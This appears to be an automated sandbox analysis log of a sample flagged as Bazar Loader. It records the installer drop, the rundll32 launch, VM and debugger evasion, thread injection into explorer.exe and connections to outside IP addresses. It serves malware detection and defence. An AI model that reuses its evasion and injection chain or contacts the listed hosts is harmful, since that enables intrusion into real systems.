Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50023
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50024
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50026
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50027
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50029
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50030
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50030
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50032
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50033
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50036
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50037
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50039
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50040
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50042
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50043
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50052
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains functionality to query network adapater information
Source: C:\Windows\System32\rundll32.exe Code function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo, 6_2_000001FF4CAF4D00
Source: C:\Windows\explorer.exe Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA, 8_2_03058424
Source: C:\Windows\explorer.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 8_2_03057274
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 4125 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 5725 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 8824 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 429 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 881 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 867 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\vierm_soft_x64.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIF101.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIF1BF.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIF1DF.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIF160.tmp Jump to dropped file
Found evasive API chain checking for process token information
Source: C:\Windows\System32\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Installer\MSIF29D.tmp Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Windows\Installer\MSIF29D.tmp API coverage: 6.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\msiexec.exe TID: 3452 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 3396 Thread sleep count: 4125 > 30 Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 3396 Thread sleep time: -247500000s >= -30000s Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 3396 Thread sleep count: 5725 > 30 Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 3396 Thread sleep time: -343500000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6148 Thread sleep count: 8824 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6148 Thread sleep time: -8824000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 3924 Thread sleep count: 429 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 3924 Thread sleep time: -42900s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6148 Thread sleep count: 243 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6148 Thread sleep time: -243000s >= -30000s Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FEAF79 FindFirstFileExW, 4_2_00FEAF79
Source: C:\Windows\explorer.exe Code function: 8_2_0305A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW, 8_2_0305A8E0
Source: C:\Windows\explorer.exe Code function: 8_2_03052B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 8_2_03052B28
Source: C:\Windows\explorer.exe Code function: 8_2_030604C0 FindFirstFileW, 8_2_030604C0
Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 60000 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 60000 Jump to behavior
Source: explorer.exe, 00000008.00000003.3094523211.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 00000008.00000000.2452717662.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.2452717662.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 00000008.00000002.3333615520.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000008.00000000.2446927908.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: rundll32.exe, 00000006.00000002.3332076257.000001FF4AE58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2171396063.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2452717662.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000008.00000003.3094346841.000000000C8C5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTcaVMWare
Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000008.00000002.3333615520.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000008.00000003.3094523211.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DisableGuestVmNetworkConnectivity
Source: explorer.exe, 00000008.00000002.3333615520.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2171396063.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWK
Source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: EnableGuestVmNetworkConnectivity
Source: explorer.exe, 00000008.00000002.3333615520.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware,p
Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: explorer.exe, 00000008.00000000.2446927908.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000008.00000000.2452717662.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000002.3335475832.0000000007693000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CADCCE0 LdrGetProcedureAddress, 6_2_000001FF4CADCCE0
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FBD0A5 IsDebuggerPresent,OutputDebugStringW, 4_2_00FBD0A5
Contains functionality to read the PEB
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FE2DCC mov ecx, dword ptr fs:[00000030h] 4_2_00FE2DCC
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FEAD78 mov eax, dword ptr fs:[00000030h] 4_2_00FEAD78
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FB2310 GetProcessHeap, 4_2_00FB2310
Launches processes in debugging mode, may be used to hinder debugging
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\Installer\MSIF29D.tmp "C:\Windows\Installer\MSIF29D.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FD33A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00FD33A8
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FD353F SetUnhandledExceptionFilter, 4_2_00FD353F
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FD2968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00FD2968
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FD6E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00FD6E1B
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800402A0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00000001800402A0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018005C2BC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_000000018005C2BC

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\rundll32.exe Network Connect: 82.115.223.39 8041 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 188.114.96.3 443 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Network Connect: 80.78.24.30 8041 Jump to behavior
Allocates memory in foreign processes
Source: C:\Windows\System32\rundll32.exe Memory allocated: C:\Windows\explorer.exe base: 3050000 protect: page execute and read and write Jump to behavior
Contains functionality to inject threads in other processes
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00007DF459570100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread, 6_3_00007DF459570100
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000273F41380 Sleep,SleepEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject, 6_2_0000000273F41380
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\rundll32.exe Thread created: C:\Windows\explorer.exe EIP: 3050000 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Windows\System32\rundll32.exe Memory written: C:\Windows\explorer.exe base: 3050000 value starts with: 4D5A Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\rundll32.exe Memory written: PID: 1028 base: 3050000 value: 4D Jump to behavior
Sets debug register (to hijack the execution of another thread)
Source: C:\Windows\System32\rundll32.exe Thread register set: 5880 1 Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\System32\rundll32.exe Memory written: C:\Windows\explorer.exe base: 3050000 Jump to behavior
Contains functionality to launch a program with higher privileges
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FB52F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcessId,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,GetProcessId,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess, 4_2_00FB52F0
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\Installer\MSIF29D.tmp Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState Jump to behavior
Source: explorer.exe, 00000008.00000000.2452717662.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000008.00000002.3332339160.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2447498972.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000008.00000000.2449712553.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3332339160.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2447498972.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000002.3332339160.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2447498972.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000008.00000002.3332339160.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2447498972.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000008.00000002.3331052313.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2446927908.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PProgman
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FD35A9 cpuid 4_2_00FD35A9
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\Installer\MSIF29D.tmp Code function: EnumSystemLocalesW, 4_2_00FEE0C6
Source: C:\Windows\Installer\MSIF29D.tmp Code function: EnumSystemLocalesW, 4_2_00FEE1AC
Source: C:\Windows\Installer\MSIF29D.tmp Code function: EnumSystemLocalesW, 4_2_00FE7132
Source: C:\Windows\Installer\MSIF29D.tmp Code function: EnumSystemLocalesW, 4_2_00FEE111
Source: C:\Windows\Installer\MSIF29D.tmp Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 4_2_00FEE237
Source: C:\Windows\Installer\MSIF29D.tmp Code function: GetLocaleInfoEx, 4_2_00FD23F8
Source: C:\Windows\Installer\MSIF29D.tmp Code function: GetLocaleInfoW, 4_2_00FEE48A
Source: C:\Windows\Installer\MSIF29D.tmp Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 4_2_00FEE5B3
Source: C:\Windows\Installer\MSIF29D.tmp Code function: GetLocaleInfoW, 4_2_00FEE6B9
Source: C:\Windows\Installer\MSIF29D.tmp Code function: GetLocaleInfoW, 4_2_00FE76AF
Source: C:\Windows\Installer\MSIF29D.tmp Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 4_2_00FEE788
Source: C:\Windows\Installer\MSIF29D.tmp Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 4_2_00FEDE24
Source: C:\Windows\System32\rundll32.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 6_2_0000000180053038
Source: C:\Windows\System32\rundll32.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 6_2_0000000180052534
Source: C:\Windows\System32\rundll32.exe Code function: EnumSystemLocalesW, 6_2_0000000180052904
Source: C:\Windows\System32\rundll32.exe Code function: EnumSystemLocalesW, 6_2_00000001800529D4
Source: C:\Windows\System32\rundll32.exe Code function: GetLocaleInfoW, 6_2_0000000180048A24
Source: C:\Windows\System32\rundll32.exe Code function: EnumSystemLocalesW, 6_2_0000000180047A78
Source: C:\Windows\System32\rundll32.exe Code function: EnumSystemLocalesW, 6_2_0000000180047BBC
Source: C:\Windows\System32\rundll32.exe Code function: EnumSystemLocalesW, 6_2_0000000180047C44
Source: C:\Windows\System32\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 6_2_0000000180052E38
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FD37D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 4_2_00FD37D5
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAF4D00 GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo, 6_2_000001FF4CAF4D00
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FE7B1F GetTimeZoneInformation, 4_2_00FE7B1F
Source: C:\Windows\explorer.exe Code function: 8_2_0305891C RtlGetVersion,GetVersionExW, 8_2_0305891C
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Bazar Loader
Source: Yara match File source: 6.2.rundll32.exe.1ff4b020000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.1ff4b0a0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.1ff4b0a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3332247627.000001FF4B020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
